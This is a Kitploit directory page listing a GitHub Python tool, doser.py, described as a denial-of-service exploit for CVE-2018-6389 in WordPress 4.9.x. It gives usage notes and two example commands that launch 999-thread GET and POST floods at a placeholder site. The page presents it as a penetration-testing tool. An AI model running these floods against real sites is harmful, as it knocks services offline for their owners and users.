Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-6389 — Python-based denial-of-service exploit for CVE-2018-6389 targeting WordPress 4.9.x. Supports multi-threaded GET/POST requests with custom headers and JSON payloads for penetration testing. | Kitploit
Tools/GitHubGitHub/ianxtianxt/cve-2018-6389
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubianxtianxt/cve-2018-6389

CVE-2018-6389

Python-based denial-of-service exploit for CVE-2018-6389 targeting WordPress 4.9.x. Supports multi-threaded GET/POST requests with custom headers and JSON payloads for penetration testing.

View Repository
3116 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

doser.py

DoS tool for HTTP requests (inspired by hulk but has more functionalities) written in Python:

Examples

999 threads sends GET requests:

root@kitploit:~
python doser.py -t 999 -g 'https://targeted.site.com'

999 threads sends POST requests with json data:

root@kitploit:~
python doser.py -t 999 -p 'https://targeted.site.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'

Usage

usage: doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]

optional arguments:

-h, --help show this help message and exit

-g Specify GET request. Usage: -g '< url >'

-p Specify POST request. Usage: -p '< url >'

-d Specify data payload for POST request

-ah Specify addtional header

-t Specify number of threads to be used

TODO:

Rewrite to Golang :)

Download Tool